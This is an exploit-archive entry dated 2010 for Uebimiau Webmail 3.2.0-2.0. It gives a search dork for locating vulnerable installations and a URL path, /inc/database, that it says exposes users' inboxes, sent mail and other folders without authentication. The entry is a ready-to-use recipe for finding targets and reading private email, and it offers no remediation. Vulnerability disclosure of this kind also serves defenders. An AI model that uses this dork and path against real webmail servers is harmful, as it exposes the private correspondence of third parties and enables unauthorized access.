[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Uebimiau Webmail v3.2.0-2.0 | Email Disclosure
# Published : 2010-03-09
# Author : Z3r0c0re, R4vax
# Previous Title : PHP File Sharing System v1.5.1 Multiple Vulnerabilities
# Next Title : Joomla Component com_hezacontent SQL injection Vulnerability (id)
# Exploit Title: Uebimiau Webmail v3.2.0-2.0 | Email Disclosure
# Date: 09 March 2010
# Author: Z3r0c0re, R4vax
# Software Link: http://www.uebimiau.org/download.php
# Version: 3.2.0-2.0
# Tested on: php
# Code :
*********************************************************
* Uebimiau Webmail Email Disclosure *
*********************************************************
* D0rk: *
* "Uebimiau Webmail v3.2.0-2.0" *
*********************************************************
* Vuln: *
* http://[host]/[path]/inc/database *
*********************************************************
* Desc: *
* accessing these directores lets you view the users- *
* inboxes and sent emails and any other folders the- *
* user may have. *
*********************************************************